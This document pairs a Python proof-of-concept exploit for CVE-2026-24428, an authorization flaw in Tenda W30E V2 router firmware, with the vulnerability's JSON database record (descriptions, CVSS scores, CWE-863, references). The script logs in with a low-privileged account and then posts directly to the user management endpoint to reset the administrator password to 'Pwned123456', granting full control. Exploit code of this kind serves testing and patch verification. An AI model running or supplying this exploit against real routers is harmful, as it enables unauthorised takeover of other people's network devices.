CVE-2026-24428

import requests # CVE-2026-24428 PoC - Tenda W30E V2 Authorization Bypass # Target: Tenda W30E V2 router with firmware <= V16.01.0.19(5037) TARGET_IP = "192.168.0.1" LOGIN_URL = f"http://{TARGET_IP}/login.cgi" PASSWORD_CHANGE_URL = f"http://{TARGET_IP}/cgi-bin/user_mng.cgi" def exploit_cve_2026_24428(target_ip, low_priv_user, low_priv_pass, target_user="admin", new_password="Pwned123456"): """ Exploit for CVE-2026-24428: Tenda W30E V2 incorrect authorization Allows low-privileged authenticated user to change admin password """ session = requests.Session() # Step 1: Authenticate with low-privilege account login_data = { "username": low_priv_user, "password": low_priv_pass } login_response = session.post(LOGIN_URL, data=login_data) if login_response.status_code != 200: print("[-] Login failed") return False print("[+] Successfully authenticated with low-privilege account") # Step 2: Bypass authorization and change admin password # This direct API call bypasses web interface RBAC checks exploit_data = { "username": target_user, "password": new_password, "cur_password": "", # Not validated server-side "group": "admin" } exploit_response = session.post(PASSWORD_CHANGE_URL, data=exploit_data) if "success" in exploit_response.text.lower() or exploit_response.status_code == 200: print(f"[+] Successfully changed {target_user} password to: {new_password}") print("[+] Full administrative access obtained!") return True else: print(f"[-] Exploit failed. Response: {exploit_response.text}") return False if __name__ == "__main__": import sys if len(sys.argv) < 4: print("Usage: python cve_2026_24428.py <target_ip> <low_priv_user> <low_priv_pass>") sys.exit(1) exploit_cve_2026_24428(sys.argv[1], sys.argv[2], sys.argv[3])

{"cve": {"id": "CVE-2026-24428", "sourceIdentifier": "[email protected]", "published": "2026-01-26T18:16:40.117", "lastModified": "2026-01-29T13:02:04.990", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) contain an authorization flaw in the user management API that allows a low-privileged authenticated user to change the administrator account password. By sending a crafted request directly to the backend endpoint, an attacker can bypass role-based restrictions enforced by the web interface and obtain full administrative privileges."}, {"lang": "es", "value": "Las versiones de firmware de Shenzhen Tenda W30E V2 hasta la V16.01.0.19(5037) inclusive contienen una falla de autorización en la API de gestión de usuarios que permite a un usuario autenticado con bajos privilegios cambiar la contraseña de la cuenta de administrador. Al enviar una solicitud manipulada directamente al endpoint del backend, un atacante puede eludir las restricciones basadas en roles impuestas por la interfaz web y obtener privilegios administrativos completos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:w30e_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "16.01.0.19\\(5037\\)", "matchCriteriaId": "4DB07B19-71FC-4936-98BD-36A8B3B7CBF0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:w30e:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "56B9C2BB-D36E-40F8-83FF-FC919337F6BD"}]}]}], "references": [{"url": "https://www.tendacn.com/product/W30E", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/tenda-w30e-v2-incorrect-authorization-allows-administrator-password-change", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}